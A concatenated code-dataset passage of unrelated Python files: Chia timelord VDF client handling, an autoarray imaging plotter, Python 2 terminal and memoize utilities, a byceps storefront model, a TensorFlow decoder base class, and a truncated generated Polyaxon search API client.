prefix = "0" + prefix
async with self.lock:
writer.write((prefix + str(disc)).encode())
await writer.drain()
# Send initial_form prefixed with its length.
async with self.lock:
writer.write(bytes([len(initial_form.data)]) + initial_form.data)
await writer.drain()
try:
ok = await reader.readexactly(2)
except (asyncio.IncompleteReadError, ConnectionResetError, Exception) as e:
log.warning(f"{type(e)} {e}")
async with self.lock:
self.vdf_failures.append((chain, proof_label))
self.vdf_failures_count += 1
return None
if ok.decode() != "OK":
return None
log.debug("Got handshake with VDF client.")
if not self.sanitizer_mode:
async with self.lock:
self.allows_iters.append(chain)
else:
async with self.lock:
assert chain is Chain.BLUEBOX
assert bluebox_iteration is not None
prefix = str(len(str(bluebox_iteration)))
if len(str(bluebox_iteration)) < 10:
prefix = "0" + prefix
iter_str = prefix + str(bluebox_iteration)
writer.write(iter_str.encode())
await writer.drain()
# Listen to the client until "STOP" is received.
while True:
try:
data = await reader.readexactly(4)
except (
asyncio.IncompleteReadError,
ConnectionResetError,
Exception,
) as e:
log.warning(f"{type(e)} {e}")
async with self.lock:
self.vdf_failures.append((chain, proof_label))
self.vdf_failures_count += 1
break
msg = ""
try:
msg = data.decode()
except Exception:
pass
if msg == "STOP":
log.debug(f"Stopped client running on ip {ip}.")
async with self.lock:
writer.write(b"ACK")
await writer.drain()
break
else:
try:
# This must be a proof, 4 bytes is length prefix
length = int.from_bytes(data, "big")
proof = await reader.readexactly(length)
stdout_bytes_io: io.BytesIO = io.BytesIO(bytes.fromhex(proof.decode()))
except (
asyncio.IncompleteReadError,
ConnectionResetError,
Exception,
) as e:
log.warning(f"{type(e)} {e}")
async with self.lock:
self.vdf_failures.append((chain, proof_label))
self.vdf_failures_count += 1
break
iterations_needed = uint64(int.from_bytes(stdout_bytes_io.read(8), "big", signed=True))
y_size_bytes = stdout_bytes_io.read(8)
y_size = uint64(int.from_bytes(y_size_bytes, "big", signed=True))
y_bytes = stdout_bytes_io.read(y_size)
witness_type = uint8(int.from_bytes(stdout_bytes_io.read(1), "big", signed=True))
proof_bytes: bytes = stdout_bytes_io.read()
# Verifies our own proof just in case
form_size = ClassgroupElement.get_size(self.constants)
output = ClassgroupElement.from_bytes(y_bytes[:form_size])
if not self.sanitizer_mode:
time_taken = time.time() - self.chain_start_time[chain]
ips = int(iterations_needed / time_taken * 10) / 10
log.info(
f"Finished PoT chall:{challenge[:10].hex()}.. {iterations_needed}"
f" iters, "
f"Estimated IPS: {ips}, Chain: {chain}"
)
vdf_info: VDFInfo = VDFInfo(
challenge,
iterations_needed,
output,
)
vdf_proof: VDFProof = VDFProof(
witness_type,
proof_bytes,
self.sanitizer_mode,
)
if not vdf_proof.is_valid(self.constants, initial_form, vdf_info):
log.error("Invalid proof of time!")
if not self.sanitizer_mode:
async with self.lock:
assert proof_label is not None
self.proofs_finished.append((chain, vdf_info, vdf_proof, proof_label))
else:
async with self.lock:
writer.write(b"010")
await writer.drain()
assert header_hash is not None
assert field_vdf is not None
assert height is not None
response = timelord_protocol.RespondCompactProofOfTime(
vdf_info, vdf_proof, header_hash, height, field_vdf
)
if self.server is not None:
message = make_msg(ProtocolMessageTypes.respond_compact_proof_of_time, response)
await self.server.send_to_all([message], NodeType.FULL_NODE)
except ConnectionResetError as e:
log.debug(f"Connection reset with VDF client {e}")
async def _manage_discriminant_queue_sanitizer(self):
while not self._shut_down:
async with self.lock:
try:
while len(self.pending_bluebox_info) > 0 and len(self.free_clients) > 0:
# Select randomly the field_vdf we're creating a compact vdf for.
# This is done because CC_SP and CC_IP are more frequent than
# CC_EOS and ICC_EOS. This guarantees everything is picked uniformly.
target_field_vdf = random.randint(1, 4)
info = next(
(info for info in self.pending_bluebox_info if info.field_vdf == target_field_vdf),
None,
)
if info is None:
# Nothing found with target_field_vdf, just pick the first VDFInfo.
info = self.pending_bluebox_info[0]
ip, reader, writer = self.free_clients[0]
self.process_communication_tasks.append(
asyncio.create_task(
self._do_process_communication(
Chain.BLUEBOX,
info.new_proof_of_time.challenge,
ClassgroupElement.get_default_element(),
ip,
reader,
writer,
info.new_proof_of_time.number_of_iterations,
info.header_hash,
info.height,
info.field_vdf,
)
)
)
self.pending_bluebox_info.remove(info)
self.free_clients = self.free_clients[1:]
except Exception as e:
log.error(f"Exception manage discriminant queue: {e}")
await asyncio.sleep(0.1)
|
py | b41042bc3b06dc7ceacccefb8732fa49942cacf9 | from autoarray.plot.mat_wrap.visuals import Visuals2D
from autoarray.plot.mat_wrap.include import Include2D
from autoarray.plot.mat_wrap.mat_plot import MatPlot2D
from autoarray.plot.mat_wrap.mat_plot import AutoLabels
from autoarray.plot.abstract_plotters import AbstractPlotter
from autoarray.dataset.imaging import Imaging
from autoarray.structures.grids.two_d.grid_2d_irregular import Grid2DIrregular
class AbstractImagingPlotter(AbstractPlotter):
def __init__(
self,
imaging: Imaging,
mat_plot_2d: MatPlot2D,
visuals_2d: Visuals2D,
include_2d: Include2D,
):
self.imaging = imaging
super().__init__(
mat_plot_2d=mat_plot_2d, include_2d=include_2d, visuals_2d=visuals_2d
)
@property
def visuals_with_include_2d(self) -> Visuals2D:
return self.visuals_2d + self.visuals_2d.__class__(
origin=self.extract_2d(
"origin", Grid2DIrregular(grid=[self.imaging.image.origin])
),
mask=self.extract_2d("mask", self.imaging.image.mask),
border=self.extract_2d(
"border", self.imaging.image.mask.border_grid_sub_1.binned
),
)
def figures_2d(
self,
image: bool = False,
noise_map: bool = False,
psf: bool = False,
inverse_noise_map: bool = False,
signal_to_noise_map: bool = False,
absolute_signal_to_noise_map: bool = False,
potential_chi_squared_map: bool = False,
):
"""Plot each attribute of the imaging data_type as individual figures one by one (e.g. the dataset, noise_map, PSF, \
Signal-to_noise-map, etc).
Set *autolens.data_type.array.mat_plot_2d.mat_plot_2d* for a description of all innput parameters not described below.
Parameters
-----------
imaging : data_type.ImagingData
The imaging data_type, which includes the observed data_type, noise_map, PSF, signal-to-noise_map, etc.
include_origin : True
If true, the include_origin of the dataset's coordinate system is plotted as a 'x'.
"""
if image:
self.mat_plot_2d.plot_array(
array=self.imaging.image,
visuals_2d=self.visuals_with_include_2d,
auto_labels=AutoLabels(title="Image", filename="image_2d"),
)
if noise_map:
self.mat_plot_2d.plot_array(
array=self.imaging.noise_map,
visuals_2d=self.visuals_with_include_2d,
auto_labels=AutoLabels("Noise-Map", filename="noise_map"),
)
if psf:
self.mat_plot_2d.plot_array(
array=self.imaging.psf,
visuals_2d=self.visuals_with_include_2d,
auto_labels=AutoLabels(title="Point Spread Function", filename="psf"),
)
if inverse_noise_map:
self.mat_plot_2d.plot_array(
array=self.imaging.inverse_noise_map,
visuals_2d=self.visuals_with_include_2d,
auto_labels=AutoLabels(
title="Inverse Noise-Map", filename="inverse_noise_map"
),
)
if signal_to_noise_map:
self.mat_plot_2d.plot_array(
array=self.imaging.signal_to_noise_map,
visuals_2d=self.visuals_with_include_2d,
auto_labels=AutoLabels(
title="Signal-To-Noise Map", filename="signal_to_noise_map"
),
)
if absolute_signal_to_noise_map:
self.mat_plot_2d.plot_array(
array=self.imaging.absolute_signal_to_noise_map,
visuals_2d=self.visuals_with_include_2d,
auto_labels=AutoLabels(
title="Absolute Signal-To-Noise Map",
filename="absolute_signal_to_noise_map",
),
)
if potential_chi_squared_map:
self.mat_plot_2d.plot_array(
array=self.imaging.potential_chi_squared_map,
visuals_2d=self.visuals_with_include_2d,
auto_labels=AutoLabels(
title="Potential Chi-Squared Map",
filename="potential_chi_squared_map",
),
)
def subplot(
self,
image: bool = False,
noise_map: bool = False,
psf: bool = False,
signal_to_noise_map: bool = False,
inverse_noise_map: bool = False,
absolute_signal_to_noise_map: bool = False,
potential_chi_squared_map: bool = False,
auto_filename: str = "subplot_imaging",
):
self._subplot_custom_plot(
image=image,
noise_map=noise_map,
psf=psf,
signal_to_noise_map=signal_to_noise_map,
inverse_noise_map=inverse_noise_map,
absolute_signal_to_noise_map=absolute_signal_to_noise_map,
potential_chi_squared_map=potential_chi_squared_map,
auto_labels=AutoLabels(filename=auto_filename),
)
def subplot_imaging(self):
self.subplot(
image=True,
noise_map=True,
psf=True,
signal_to_noise_map=True,
inverse_noise_map=True,
potential_chi_squared_map=True,
)
class ImagingPlotter(AbstractImagingPlotter):
def __init__(
self,
imaging: Imaging,
mat_plot_2d: MatPlot2D = MatPlot2D(),
visuals_2d: Visuals2D = Visuals2D(),
include_2d: Include2D = Include2D(),
):
super().__init__(
imaging=imaging,
mat_plot_2d=mat_plot_2d,
include_2d=include_2d,
visuals_2d=visuals_2d,
)
|
py | b41042e5988e8d27b58649ccaf22e396c4b031cb | import copy
import subprocess
import sys
import unicodedata
def disable_colored_func(text, *args, **kwargs):
return text
try:
from termcolor import colored as colored_func
except ImportError:
print 'You should run "pip install termcolor" to fully utilize these utilities.'
colored_func = disable_colored_func
def supports_color():
"""
Returns True if the running system's terminal supports color, and False
otherwise.
"""
unsupported_platform = (sys.platform in ('win32', 'Pocket PC'))
# isatty is not always implemented, #6223.
is_a_tty = hasattr(sys.stdout, 'isatty') and sys.stdout.isatty()
if unsupported_platform or not is_a_tty:
return False
return True
if not supports_color():
colored_func = disable_colored_func
class Colored(object):
disabled = False
def __call__(self, *args, **kwargs):
if self.disabled:
return disable_colored_func(*args, **kwargs)
return colored_func(*args, **kwargs)
colored = Colored()
def force_unicode(obj, encoding='utf-8'):
if isinstance(obj, basestring):
if not isinstance(obj, unicode):
obj = unicode(obj, encoding)
# Normalize the unicode data to have characters that in NFKD format would be represented by 2 characters, instead of 1.
obj = unicodedata.normalize('NFKC', obj)
return obj
def force_str(obj, encoding='utf-8'):
if isinstance(obj, basestring):
if not isinstance(obj, str):
obj = obj.encode(encoding)
return obj
def console(obj):
sys.stdout.write(force_str(obj))
class AccumulatorDict(dict):
def __init__(self, default, *args, **kwargs):
self.__default = default
def __getitem__(self, key):
if key not in self:
self[key] = copy.copy(self.__default)
return super(AccumulatorDict, self).__getitem__(key)
def memoize(func):
def _(self, *args, **kwargs):
if not hasattr(self, '__memoize_cache'):
self.__memoize_cache = AccumulatorDict(AccumulatorDict({}))
key = tuple([ tuple(args), tuple([ tuple([x, y]) for x, y in kwargs.items() ]) ])
if key not in self.__memoize_cache[func]:
self.__memoize_cache[func][key] = func(self, *args, **kwargs)
return self.__memoize_cache[func][key]
return _
def terminal_dimensions():
try:
# This probably does not work on windows, but it should work just about
# everywhere else.
p = subprocess.Popen(['stty', 'size'], stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate(None)
stdout = force_unicode(stdout)
stderr = force_unicode(stderr)
rows, columns = [ int(x) for x in stdout.split() ]
except:
rows, columns = 40, 79
return rows, columns
|
py | b4104472c80a3ccb18e9d8e7106bb2d3d34931e8 | """
byceps.services.shop.storefront.dbmodels
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:Copyright: 2014-2022 Jochen Kupperschmidt
:License: Revised BSD (see `LICENSE` file for details)
"""
from typing import Optional
from ....database import db
from ....util.instances import ReprBuilder
# Make shop catalog tables available for database creation.
from ..catalog.dbmodels import Catalog
from ..catalog.transfer.models import CatalogID
from ..order.transfer.number import OrderNumberSequenceID
from ..shop.transfer.models import ShopID
from .transfer.models import StorefrontID
class Storefront(db.Model):
"""A storefront.
The entrypoint from a site to a shop.
"""
__tablename__ = 'shop_storefronts'
id = db.Column(db.UnicodeText, primary_key=True)
shop_id = db.Column(db.UnicodeText, db.ForeignKey('shops.id'), index=True, nullable=False)
catalog_id = db.Column(db.Uuid, db.ForeignKey('shop_catalogs.id'), nullable=True)
order_number_sequence_id = db.Column(db.Uuid, db.ForeignKey('shop_order_number_sequences.id'), nullable=False)
closed = db.Column(db.Boolean, nullable=False)
def __init__(
self,
storefront_id: StorefrontID,
shop_id: ShopID,
order_number_sequence_id: OrderNumberSequenceID,
closed: bool,
*,
catalog_id: Optional[CatalogID] = None,
) -> None:
self.id = storefront_id
self.shop_id = shop_id
self.catalog_id = catalog_id
self.order_number_sequence_id = order_number_sequence_id
self.closed = closed
def __repr__(self) -> str:
return ReprBuilder(self) \
.add_with_lookup('id') \
.add_with_lookup('shop_id') \
.build()
|
py | b4104577bf001755e0f6039fead9259f5d1624c7 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Contains helper functions and classes necessary for decoding data.
While data providers read data from disk, sstables or other formats, data
decoders decode the data (if necessary). A data decoder is provided with a
serialized or encoded piece of data as well as a list of items and
returns a set of tensors, each of which correspond to the requested list of
items extracted from the data:
def Decode(self, data, items):
...
For example, if data is a compressed map, the implementation might be:
def Decode(self, data, items):
decompressed_map = _Decompress(data)
outputs = []
for item in items:
outputs.append(decompressed_map[item])
return outputs.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import six
@six.add_metaclass(abc.ABCMeta)
class DataDecoder(object):
"""An abstract class which is used to decode data for a provider."""
@abc.abstractmethod
def decode(self, data, items):
"""Decodes the data to returns the tensors specified by the list of items.
Args:
data: A possibly encoded data format.
items: A list of strings, each of which indicate a particular data type.
Returns:
A list of `Tensors`, whose length matches the length of `items`, where
each `Tensor` corresponds to each item.
Raises:
ValueError: If any of the items cannot be satisfied.
"""
pass
@abc.abstractmethod
def list_items(self):
"""Lists the names of the items that the decoder can decode.
Returns:
A list of string names.
"""
pass
|
py | b410465fc4e1677105c2b150d954fa058048efaf | #!/usr/bin/python
#
# Copyright 2018-2021 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
"""
Polyaxon SDKs and REST API specification.
Polyaxon SDKs and REST API specification. # noqa: E501
The version of the OpenAPI document: 1.10.1
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from polyaxon_sdk.api_client import ApiClient
from polyaxon_sdk.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class SearchesV1Api(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_search(self, owner, body, **kwargs): # noqa: E501
"""Create search # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_search(owner, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param V1Search body: Search body (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1Search
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_search_with_http_info(owner, body, **kwargs) # noqa: E501
def create_search_with_http_info(self, owner, body, **kwargs): # noqa: E501
"""Create search # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_search_with_http_info(owner, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param V1Search body: Search body (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1Search, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_search" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `create_search`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `create_search`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/orgs/{owner}/searches', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Search', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_search(self, owner, uuid, **kwargs): # noqa: E501
"""Delete search # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_search(owner, uuid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str uuid: Uuid identifier of the entity (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_search_with_http_info(owner, uuid, **kwargs) # noqa: E501
def delete_search_with_http_info(self, owner, uuid, **kwargs): # noqa: E501
"""Delete search # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_search_with_http_info(owner, uuid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str uuid: Uuid identifier of the entity (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'uuid'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_search" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `delete_search`") # noqa: E501
# verify the required parameter 'uuid' is set
if self.api_client.client_side_validation and ('uuid' not in local_var_params or # noqa: E501
local_var_params['uuid'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `uuid` when calling `delete_search`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'uuid' in local_var_params:
path_params['uuid'] = local_var_params['uuid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/orgs/{owner}/searches/{uuid}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_search(self, owner, uuid, **kwargs): # noqa: E501
"""Get search # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_search(owner, uuid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str uuid: Uuid identifier of the entity (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1Search
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_search_with_http_info(owner, uuid, **kwargs) # noqa: E501
def get_search_with_http_info(self, owner, uuid, **kwargs): # noqa: E501
"""Get search # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_search_with_http_info(owner, uuid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str uuid: Uuid identifier of the entity (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1Search, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'uuid'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_search" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `get_search`") # noqa: E501
# verify the required parameter 'uuid' is set
if self.api_client.client_side_validation and ('uuid' not in local_var_params or # noqa: E501
local_var_params['uuid'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `uuid` when calling `get_search`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'uuid' in local_var_params:
path_params['uuid'] = local_var_params['uuid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/orgs/{owner}/searches/{uuid}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Search', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_search_names(self, owner, **kwargs): # noqa: E501
"""List search names # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_search_names(owner, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
:param bool no_page: No pagination.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ListSearchesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_search_names_with_http_info(owner, **kwargs) # noqa: E501
def list_search_names_with_http_info(self, owner, **kwargs): # noqa: E501
"""List search names # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_search_names_with_http_info(owner, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
:param bool no_page: No pagination.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ListSearchesResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'offset',
'limit',
'sort',
'query',
'no_page'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_search_names" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `list_search_names`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
query_params = []
if 'offset' in local_var_params and local_var_params['offset'] is not None: # noqa: E501
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'sort' in local_var_params and local_var_params['sort'] is not None: # noqa: E501
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
if 'query' in local_var_params and local_var_params['query'] is not None: # noqa: E501
query_params.append(('query', local_var_params['query'])) # noqa: E501
if 'no_page' in local_var_params and local_var_params['no_page'] is not None: # noqa: E501
query_params.append(('no_page', local_var_params['no_page'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/orgs/{owner}/searches/names', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ListSearchesResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_searches(self, owner, **kwargs): # noqa: E501
"""List searches # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_searches(owner, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
:param bool no_page: No pagination.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ListSearchesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_searches_with_http_info(owner, **kwargs) # noqa: E501
def list_searches_with_http_info(self, owner, **kwargs): # noqa: E501
"""List searches # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_searches_with_http_info(owner, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
:param bool no_page: No pagination.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ListSearchesResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'offset',
'limit',
'sort',
'query',
'no_page'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
